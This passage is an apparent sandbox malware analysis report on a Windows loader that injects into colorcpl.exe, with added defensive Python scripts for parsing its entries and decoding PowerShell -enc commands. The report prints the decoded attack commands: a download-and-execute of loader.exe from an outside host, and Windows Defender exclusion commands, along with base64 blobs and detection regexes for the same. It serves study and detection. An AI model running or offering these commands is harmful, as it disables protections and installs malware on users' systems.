Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (69 identical entries)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\Xdnxwtne.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF0000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF1000 memory commit 500154368
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3016000 memory commit 500002816
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3017000 memory commit 500047872
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3022000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3026000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3027000 memory commit 500015104
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3020000 memory commit 500006912
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3021000 memory commit 500154368
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3046000 memory commit 500002816
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3047000 memory commit 500047872
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3052000 memory commit 500015104
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3056000 memory commit 500006912
Source: C:\Users\user\Links\Xdnxwtne.PIF Memory allocated: 3057000 memory commit 500015104
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_0041A941
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 20_2_06C8B752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 identical entries)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1670
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6512
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3019
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: threadDelayed 9482
Source: C:\Windows\SysWOW64\colorcpl.exe Window / User API: foregroundWindowGot 1755
Source: C:\Windows\SysWOW64\colorcpl.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 6.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep count: 1670 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 120 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052 Thread sleep count: 36 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 2007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976 Thread sleep count: 132 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308 Thread sleep count: 6512 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep count: 3019 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7768 Thread sleep time: -72000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -510000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -28446000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7980 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF54D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 14_2_02FF54D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_004090DC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_0040B6B5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_0041C7E5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_0040B8BA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0044E989 FindFirstFileExA, 20_2_0044E989
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_00408CDE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 20_2_00419CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_00407EDD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00406F13 FindFirstFileW,FindNextFileW, 20_2_00406F13
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C6CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 20_2_06C7C6CB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C7C4C6 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 20_2_06C7C4C6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C78CEE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 20_2_06C78CEE
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8AAFF FindFirstFileW, 20_2_06C8AAFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CBF79A FindFirstFileExA, 20_2_06CBF79A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C8D5F6 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 20_2_06C8D5F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79EED __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 20_2_06C79EED
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C77D24 FindFirstFileW,FindNextFileW, 20_2_06C77D24
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C79AEF __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 20_2_06C79AEF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 20_2_00407357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 identical entries)
Source: powershell.exe, 00000009.00000002.1266020687.000002C4F9F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2207211203.000002403125B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000016.00000002.2205682371.000002402BC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000014.00000002.2203224741.0000000002C61000.00000004.00000020.00020000.00000000.sdmp, Xdnxwtne.PIF, 00000015.00000002.1217550294.00000000005EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: loader.exe, 0000000E.00000002.1069243919.00000000006DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
Source: C:\Users\user\AppData\Local\Temp\loader.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
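The allocation and sleep entries in this section are raw numbers. The script below is an added example (it is not part of this report and not Joe Sandbox code): it parses behaviour lines in the format used above into a per-process summary and applies the report's own thresholds (sleep time >= 30000, sleep count > 30) plus an assumed 100 MiB per-allocation / 1 GiB cumulative threshold for the "large memory junks" signature. The sample lines are copied from this section, with the link text removed.

```python
import re
from dataclasses import dataclass

# Constructed sample input: behaviour lines copied from the "Malware Analysis System
# Evasion" section of this report (link text removed). One unrelated line is included
# to show that unknown event types are skipped rather than mis-parsed.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF0000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 2FF1000 memory commit 500154368
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3016000 memory commit 500002816
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3017000 memory commit 500047872
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3022000 memory commit 500015104
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3026000 memory commit 500006912
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: 3027000 memory commit 500015104
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep count: 1670 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep count: 2007 > 30
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7768 Thread sleep time: -72000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -510000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7772 Thread sleep time: -28446000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7980 Thread sleep time: -30000s >= -30000s
""".strip().splitlines()

# Line shapes as they appear in this report section.
ALLOC_RE = re.compile(r"^Source: (?P<proc>.+?) Memory allocated: (?P<addr>[0-9A-Fa-f]+) memory commit (?P<bytes>\d+)$")
SLEEP_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep time: -?(?P<t>\d+)s >= -?\d+s$")
LOOP_RE = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) Thread sleep count: (?P<n>\d+) > \d+$")

# Thresholds. The sleep thresholds are the ones the report prints in each line; the
# allocation thresholds are assumptions for this example, not values from the report.
SLEEP_THRESHOLD = 30_000
LOOP_THRESHOLD = 30
LARGE_ALLOC = 100 * 1024 * 1024      # single commit >= 100 MiB counts as "large"
LARGE_TOTAL = 1 << 30                # >= 1 GiB of large commits per process is flagged


@dataclass
class ProcSummary:
    large_allocs: int = 0   # number of commits >= LARGE_ALLOC
    committed: int = 0      # bytes across those large commits
    max_sleep: int = 0      # largest "Thread sleep time" value seen (report units)
    max_loop: int = 0       # largest "Thread sleep count" value seen


def mib(n: int) -> float:
    """Bytes to MiB, for readable output."""
    return n / (1024 * 1024)


def summarize(lines):
    """Fold report lines into one ProcSummary per source process; unknown lines are skipped."""
    out = {}
    for line in lines:
        line = line.strip()
        if m := ALLOC_RE.match(line):
            size = int(m["bytes"])
            s = out.setdefault(m["proc"], ProcSummary())
            if size >= LARGE_ALLOC:
                s.large_allocs += 1
                s.committed += size
        elif m := SLEEP_RE.match(line):
            s = out.setdefault(m["proc"], ProcSummary())
            s.max_sleep = max(s.max_sleep, int(m["t"]))
        elif m := LOOP_RE.match(line):
            s = out.setdefault(m["proc"], ProcSummary())
            s.max_loop = max(s.max_loop, int(m["n"]))
    return out


def verdicts(summary):
    """Apply the thresholds; returns process -> list of evasion flags (possibly empty)."""
    flags = {}
    for proc, s in summary.items():
        hits = []
        if s.committed >= LARGE_TOTAL:
            hits.append("large_memory_commit")
        if s.max_sleep >= SLEEP_THRESHOLD:      # mirrors the report's ">= -30000s" comparison
            hits.append("long_sleep")
        if s.max_loop > LOOP_THRESHOLD:         # mirrors the report's "> 30" comparison
            hits.append("sleep_loop")
        flags[proc] = hits
    return flags


if __name__ == "__main__":
    summary = summarize(SAMPLE_LINES)
    for proc, hits in verdicts(summary).items():
        s = summary[proc]
        print(f"{proc}: {s.large_allocs} large commits ({mib(s.committed):.0f} MiB), "
              f"max sleep {s.max_sleep}, max loop {s.max_loop} -> {hits or 'no flags'}")
```

On this report's lines the script attributes seven commits of roughly 477 MiB (about 3.3 GiB in total) to loader.exe, a pattern that exhausts low-memory analysis VMs before the payload runs. The 922337203685477 value from powershell.exe is the .NET infinite timeout (TimeSpan.MaxValue in milliseconds) and is produced legitimately when PowerShell waits on a child process, so treat it as weak evidence on its own; the svchost.exe entry sits exactly on the threshold and is noise. Weight flags by process, not just by count.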

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_0300B014 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 14_2_0300B014
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process queried: DebugPort
Source: C:\Users\user\Links\Xdnxwtne.PIF Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_0043B88D
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03003FB4 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 14_2_03003FB4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004438F4 mov eax, dword ptr fs:[00000030h] 20_2_004438F4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C710EB mov eax, dword ptr fs:[00000030h] 20_2_06C710EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C710EB mov eax, dword ptr fs:[00000030h] 20_2_06C710EB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CB4705 mov eax, dword ptr fs:[00000030h] 20_2_06CB4705
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError, 20_2_00411999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (4 identical entries)
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_00435398
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00434D6E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00434F01 SetUnhandledExceptionFilter, 20_2_00434F01
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CAC69E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_06CAC69E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA61A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_06CA61A9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA5D12 SetUnhandledExceptionFilter, 20_2_06CA5D12
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06CA5B7F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_06CA5B7F

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\loader.exe Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6C71592
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded $url = "http://www.nawatbsc.com/file/loader.exe"$output = "$env:Temp/loader.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\loader.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6C70000
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_004197D9 mouse_event, 20_2_004197D9
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\loader.exe "C:\Users\user~1\AppData\Local\Temp\loader.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaaogavac8adwb3ahcalgbuageadwbhahqaygbzagmalgbjag8abqavagyaaqbsagualwbsag8ayqbkaguacgauaguaeablaciacgakag8adqb0ahaadqb0acaapqagaciajablag4adga6afqazqbtahaalwbsag8ayqbkaguacgauaguaeablaciacgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiabaagac0atwb1ahqargbpagwazqagacqabwb1ahqacab1ahqacgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaakag8adqb0ahaadqb0aa==
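The three wscript.exe to powershell.exe launches above carry the whole first stage in -enc arguments (base64 over UTF-16LE). The script below is an added example, not part of this report and not Joe Sandbox or Sigma code: it extracts and decodes such command lines and runs three detection rules whose names mirror the Sigma hits listed at the top of the report (Defender exclusion via cmdlet, via the Policies registry key, and download-then-execute); the regexes themselves are mine. The sample input is the three command lines recorded in this report plus the case-folded copy of the second one that also appears in it.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample input: command lines copied from this report. The last entry is the
# lower-cased copy of the second one, as shown later in the same section.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==',
    r'"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==',
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so the flag is matched loosely; -ExecutionPolicy and friends do not match.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)

# Detection rules run over the DECODED script. Names mirror the Sigma hits in this
# report's signature list; the patterns are this example's own.
RULES = [
    ("defender_exclusion_cmdlet",
     re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion", re.I | re.S)),
    ("defender_exclusion_registry",
     re.compile(r"Windows Defender\\Exclusions", re.I)),
    ("download_and_execute",
     re.compile(r"(?:Invoke-WebRequest|DownloadFile|DownloadString|Net\.WebClient)"
                r".*?(?:Start-Process|Invoke-Expression|\bIEX\b|Invoke-Item)", re.I | re.S)),
]
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
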